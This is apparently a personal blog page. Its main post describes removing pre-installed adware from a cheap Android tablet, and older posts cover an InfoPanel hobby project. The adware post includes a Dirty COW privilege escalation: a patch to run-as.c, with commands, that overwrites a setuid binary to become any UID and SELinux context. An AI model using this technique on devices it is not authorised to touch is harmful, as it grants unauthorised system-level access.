...stuff I do and things I like...

Saturday, January 05 2019

Getting 'rid' of pre-installed Malware on my YellYouth Android Tablet

In November I bought a cheap Android Tablet for a wall-mounted display (see this blog post: Android InfoPanel). After a couple of days (or weeks?) suddenly some overlay ads and warnings from Google Play about malicious apps appeared. I didn't have time to investigate so I just tried to close the apps and ads. This got more complicated since all of it was in Chinese. I ended up navigating the menu of what looked like a 3rd-party app store to uninstall an app named Retipuj that was flag by Google Play for ad-fraud. All of this using Google Translate on my phone.



This solution worked for a couple of days. Returning back from my Holiday trip I was greeted by overlay ads once again. Luckily I had some time on my hands to investigate. Here a short write-up.

Part 1, observations and hoping for an easy way out:
    I found one app that I didn't install (com.hero.filter), I uninstalled it via adb uninstall com.hero.filter. I tried Googling the package name but without success.

    Removing the app didn't seem to do anything. Judging by the task bar there still seem to be a number of apps running but checking via Settings/Apps and on the filesystem (/data/apps) no apps are installed. Every now and then a pop-up appears that looks like a 3rd party market trying to download and install apps. Installation is blocked by Google Play (verified apps I assume).

Part 2, looking at processes:
    I found two interesting looking processes net.atlas.utopia and android.hb.uys.pbuild looking at the SeLinux context they seem to be platform apps (u:r:platform_app:s0). These could be candidates (spoiler - they are). Using pm list packages -f I determined that net.atlas.utopia is install in /system/priv-app/Kyz2203 with the data in /data/data/net.atlas.utopia.

    pm list packages -f (only showing some interesting packages):
      package:/data/app/com.hero.filter-1/base.apk=com.hero.filter
      package:/system/app/AutoDialer/AutoDialer.apk=com.example
      package:/system/priv-app/Kyz2203/Kyz2203.apk=net.atlas.utopia
      package:/system/priv-app/reanimation/reanimation.apk=android.hb.uys.pbuild
      

Part 3, a quick peak into net.atlas.utopia:
    Permissions: this app has like every permission you can think off including install and delete packages, send SMS, read and write any setting and file. Further it has a number of app permissions that correspond to lenovo, oppo, huawei, and htc devices.

    The app registers intent filters for a number of events: boot up, time zone change, packages install/remove, outgoing calls, etc. It basically monitors everything that is going on on the device. Pretty shitty.

    The data directory also contained a dex file with the name whatsappui1.dex. A quick Google search on whatsappui1 has one hit on team cymru's hash list: whatsappui1 with not much details but identify the file as being associated with ad-based malware.

    The most interesting thing I found in this app is the use of a 3rd party library called DroidPlugin. DroidPlugin is a plugin framework for Android that allows to run any third-party apk without installation, modification or repackage. Seems like the perfect tool for malware distribution.

Part 4, a quick peak into android.hb.uys.pbuild:
    Permissions are very similar to the net.atlas.utopia including the permissions corresponding to specific device manufacturers.

    The manifest contains traces of ad related things. The library directory contains libiohook.so. The library contains symbols from Cydia Substrate. The library name appears in various search results that indicate ad related malware.

    The asset directory contains a certificate ky_dsa_public.crt with no interesting issuer. jar file that contains a dex file and two .png files that contain ascii/text.

Part 5, getting rid of it all:
    How do we get rid of pre-installed software? The system partition is read-only so we can't uninstall it! The best idea, that does not involve rooting and flashing new firmware, is disabling the package using the package manager (pm disable net.atlas.utopia) this however requires system privileges. You don't have system privileges without rooting. You can disable apps via Settings but you can only disable them if they are in the list. The ones we want to disable are not in the list.

    How do we get system? The tablet still runs a 3.10.72 kernel so it might be vulnerable to dirtycow. I checked using the tools from timwr and yes it is vulnerable to dirtycow. Using my modified version of run-as as shown in my SafetyNet Talk we can become the system user and disable any package we want by running: pm disable PACKAGE.

    Here the list of packages I disabled, so far no APKs are getting installed and I haven't seen any more ads.

    pm list packages -d
      package:com.mediatek.schpwronoff
      package:android.hb.uys.pbuild
      package:com.mediatek.ygps
      package:com.android.htmlviewer
      package:com.android.browser
      package:com.hero.filter
      package:com.example
      package:com.svox.pico
      package:com.opera.max.global
      package:com.android.dreams.phototable
      package:net.atlas.utopia
      package:com.mediatek.weather
      package:com.opera.max.loader
      package:com.qihoo.appstore
      package:com.fw.upgrade.sysoper
      package:com.android.vpndialogs
      

Part 7, Dirtycow trickery:
    As described on my slides you can modify run-as.c from timwr to become any UID with almost any SELinux context (depending on the device's SeLinux policy!). For our purpose we can become any UID and context that we require. Below some notes on how this works.

    Dirtycow lets you overwrite any file that is how you replace /system/bin/run-as with your own binary. The binary cannot be bigger then the one you are overwriting. This might be a problem when you have a very very small run-as (9k in my case).
    1|shell@KT107:/data/local/tmp $ ls -al /system/bin/run-as                      
    -rwsr-s--- root     shell        9444 2018-09-27 03:44 run-as
    
    The workaround I took was not using ndk-build to build run-as.c and instead manually running arm gcc. This will reduce the binary size due to discarding complier flags used by the ndk. Another solution would be to just load a shared library from run-as to keep the binary size small.

    Once you have my version of run-as you can become (almost) any user.
    shell@KT107:/data/local/tmp $ run-as 1000 u:r:platform_app:s0
    shell@KT107:/data/local/tmp $ id
    uid=1000(system) gid=1000(system) groups=1003(graphics),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats) context=u:r:platform_app:s0
    
    System (UID 1000) allows you to poke around /data/app/* and /data/data. If you want to explore /data/data/APP you need to assume the UID and context of that app.
    shell@KT107:/data/data $ ls -al
    drwxr-x--x u0_a13   u0_a13            u:object_r:app_data_file:s0 net.atlas.utopia
    run-as 10013 u:r:platform_app:s0
    shell@KT107:/data/data $ id
    uid=10013(u0_a13) gid=10013(u0_a13) groups=1003(graphics),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats) context=u:r:platform_app:s0
    shell@KT107:/data/data/net.atlas.utopia $ ls -al
    drwx------ u0_a13   u0_a13            2017-12-31 19:00 Plugin
    drwxrwx--x u0_a13   u0_a13            2017-12-31 19:00 app_dex
    drwxrwx--x u0_a13   u0_a13            2017-12-31 19:00 cache
    drwxrwx--x u0_a13   u0_a13            2017-12-31 19:00 databases
    drwx------ u0_a13   u0_a13            2017-12-31 19:00 fankingbox
    lrwxrwxrwx install  install           2015-12-31 19:00 lib -> /data/app-lib/net.atlas.utopia
    drwxrwx--x u0_a13   u0_a13            2019-01-03 15:56 shared_prefs
    -rw------- u0_a13   u0_a13       9572 2019-01-03 15:54 whatsappui1.dex
    

    Below is my patch for run-as.c. My version sets the UID from the first argument and the SELinux context from the second argument.
    --- run-as-crm.c	2019-01-03 17:54:41.153471054 -0500
    +++ run-as.c	2019-01-03 17:58:39.378353437 -0500
    @@ -28,6 +28,8 @@
     {
     	LOGV("uid %s %d", argv[0], getuid());
     
    +	int duid = atoi(argv[1]);
    +
     	if (setresgid(0, 0, 0) || setresuid(0, 0, 0)) {
     		LOGV("setresgid/setresuid failed");
     	}
    @@ -56,7 +58,7 @@
     				LOGV("dlsym setcon error %s", error);
     			} else {
     				setcon_t * setcon_p = (setcon_t*)setcon;
    -				ret = (*setcon_p)("u:r:shell:s0");
    +				ret = (*setcon_p)(argv[2]);
     				ret = (*getcon_p)(&secontext);
     				LOGV("context %d %s", ret, secontext);
     			}
    @@ -66,6 +68,12 @@
     		LOGV("no selinux?");
     	}
     
    +	if (setresgid(duid, duid, duid) || setresuid(duid, duid, duid)) {
    +		LOGV("setresgid/setresuid failed");
    +	}
    +	LOGV("uid %d", getuid());
    +
     	system("/system/bin/sh -i");
     
    -}
    \ No newline at end of file
    +}
    +
    

Conclusions:
    Overall I would have preferred to not get pre-installed malware on my Android Tablet as I would rather have spent my time on my InfoPanel app or on other projects. However it was impossible for me to ignore this issue and simply buy a different tablet. Tracking down the malware still was kinda fun. It was the first time I experienced the issue of pre-installed malware first hand. I' also fairly happy that I didn't have to modify the firmware since this would have cost way more time. The most interesting thing I found was definitely the DroidPlugin project that allows running APKs without installing them. I wish I had more time to reverse engineer all the different apps and how they work together. I uploaded a zip file containing most components I talked about in this blog post here: yellyouth.zip.

    I hope I finally disabled all of the components and have an ad free device.

Tuesday, November 27 2018

Android InfoPanel aka Home InfoPanel Redux

In 2007/2008 I built a InfoPanel for my apartment to show me news, the weather and other interesting and fun things. The original InfoPanel was built using a VIA x86 micro ITX board and a 17" touchscreen all fitted in a self made wooden case. The InfoPanel survived until 2012 when I moved to the U.S. It was too old and too big to bring so I dismantled it.

I always missed it and thought about brining it back. For a brief time I used an old Samsung Galaxy Tab 10" but the device was just not right. Starting with a proprietary Samsung USB connecter that didn't allow for nice looking cabling, the device was black and silver so it didn't look too nice on the wall and finally the device was just old and slow. Long story short it only stayed on the wall for a couple of weeks and I just ran a full screened web browser.

The new InfoPanel

Hardware: Android 10" tablet in a white case with a USB connector on the long side.
Software: custom Android app that hides the Android navigation elements and status bar.



Hardware
    I chose a Yellyouth Android 10" tablet, those tablets are damn cheap (just under $100) but also kinda tricky. The good parts: 4GB ram and a fast processor. The tricky parts: The product description says the resolution is 2560x1600 my device reports that resolution in the system infos but the screen reports 1216x800 pixels. The device does not contain any sensors such as a light or proximity sensor (you will see why that matters later). The GSM modem does not support T-Mobile/AT&T SIM cards, I thought this was a joke but I tried a Google Fi data-only SIM (T-mobile) and the device couldn't connect to any network (this is fine since I only use WiFi).

Software
    I wrote a small Android application that basically shows a full screen webview. I've added a back and reload button to allow returning to the main page from links I clicked. The application hides all system UI (navigation and status bar). The user can swipe from bottom to top or top to bottom to reveal the back and reload buttons. The buttons auto hide after a short timeout. A really basic Android app!

    I wanted to conserve power and turn of the screen when I'm not using the InfoPanel. Luckily saving power is a default function of Android (you can just set the inactivity timeout after which the screen will be dimmed and eventually turned off).

    The catch: how do I turn the screen back on (without pressing the power button - since that is not super practical!)?

    Ideas:
    • Motion detection using the camera: several projects exist and I've got it integrated but was not able to get it working while the screen was off (I also didn't want so spent a lot of time on this part)
    • Motion detection using the light sensor: I implemented this using a Nexus 7 tablet, a background service monitors the sensor and wakes up the device once it detects a significant change in brightness - sadly the Yellyouth device does not have a light sensor.
    • Audio activation: the idea is to monitor the ambient noise and wake up the tablet when there is a loud noise (finger snap or clap), I implemented this using a background task that records audio and discards the content and only monitors the amplitude (there is a built-in method in the SDK to query the amplitude!)
Result


All in all a fun weekend/evening project of a few hours.

Tuesday, September 09 2008

Slides for my Home InfoPanel talk from MRMCD111b

I did a talk about my Home InfoPanel project at the MRMCD111b last weekend. In the slides I try to cover the idea, the build process, some obstacles and show many pretty pictures.

The slides are available here (40 MB)

Sunday, August 03 2008

MRMCD111 Sep 5-7 in Darmstadt

I'm going to do a talk on my InfoPanel project.

Event website is at: MRMCD111

Saturday, June 14 2008

InfoPanel Case is ready!

I finally finished the case for my Infopanel, well actually my father did most of the wood work. I only designed the case and he build it with a little help from me. Judith did the paint job. Thanks to both of them!

I made a bunch of fotos of the finished device hanging on the wall. Once the panel is completed I'll post even more with better quality. The part that is missing now is the webcam and the microphone. The little hole above the screen is for the webcam. I know it almost looks like an iMac :-)

Now I need to finish the infopanel software I've started in December last year.

Sunday, January 13 2008

InfoPanel: Pennon 17" TFT disassembly

today I didn't feel so much like coding (I actually wanted to work on one of my many software projects) so I decided to do hardware stuff. I ended up disassembling the 17" TFT touchscreen I use for my InfoPanel project. This had two reasons. First I need to disassemble it in order to remove the casing to make it smaller so I can put it into my self made frame. Second I need to checkout the touchscreen controller. I think it is broken or has a software bug since it sometimes just stops reporting any events and only comes back to life after power cycling the display. I probably need to buy a new controller, any tips for where to buy such a controller (in Germany) is welcome.

On the good side I found that the actual LCD is perfect for my project. It is only 1 cm thick and has nice mounts on each side. This will make it really easy putting it in my own frame.

For those of you who like hardware porn, the images are here.

Tuesday, January 01 2008

24C3 Roundup

Mmmh somehow I never manage to blog on more then the first day of the congress :-) So here is my personal 24C3 roundup.

First a big thank you to the organizers. It was real fun again! I meet a lot of friends I only see at these kinds of events (C3, Camp, etc) and again I meet a bunch of interesting people I didn't know before.

The talks were quite good all together and I had the impression that the overall quality was better then in the years before. Also I was missing THE high light of the event. Maybe I just missed it?

A couple of people asked for my Home InfoPanel talk which I didn't give so I'm going to keep this in mind for the next conference/meeting that comes up.

As usual I meet with the Bluetooth (Security) people to chat about this and that. Evilgenius Martin has a nice story about some 24C3-Bluetooth-Stuff on his blog. I also briefly meet balle from Datenterroristen.de he is behind Bluediving (a Bluetooth security suite).

As a side note. There seems to be an exploit in the JPEG parser of Nokia Series40 phones which cause the phones to crash when ever trying to read a special kind of JPEG image file. Apparently someone was sending a special crafted file to every mobile phone with Bluetooth switched on at the congress. I heard that there is another mobile phone brand that is also vulnerable to this JPEG and apparently one guy got his phone bricked by this. I'll soon look at this JPEG and post about this issue.

Great time, see you at 25C3.